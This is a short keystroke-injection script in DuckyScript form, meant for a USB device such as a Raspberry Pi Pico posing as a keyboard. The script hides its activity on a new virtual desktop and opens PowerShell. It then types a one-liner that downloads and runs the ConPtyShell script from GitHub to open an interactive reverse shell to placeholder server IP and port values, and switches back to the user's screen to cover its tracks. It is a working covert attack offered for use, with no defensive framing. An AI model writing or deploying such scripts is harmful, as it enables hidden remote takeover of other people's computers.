REM Some things in the script need to be substituted!
REM You also need to convert to Duckyscript unless you are using a Raspberry Pi Pico (link in directions)
REM Timing may need to be adjusted

REM Starts by hiding
DELAY 500
CTRL GUI d
DELAY 500
REM Now it enters the command
GUI r
DELAY 300
STRING powershell
DELAY 100
ENTER
DELAY 2000
STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell INSERT_SERVER_IP_HERE INSERT_PORT_HERE
DELAY 200
ENTER
DELAY 3000
REM Might need to trust the pc
STRING y
DELAY 200
ENTER
DELAY 400
REM Returns to their screen
CTRL GUI left
DELAY 200
CTRL GUI left
DELAY 200
CTRL GUI left
DELAY 200
CTRL GUI left
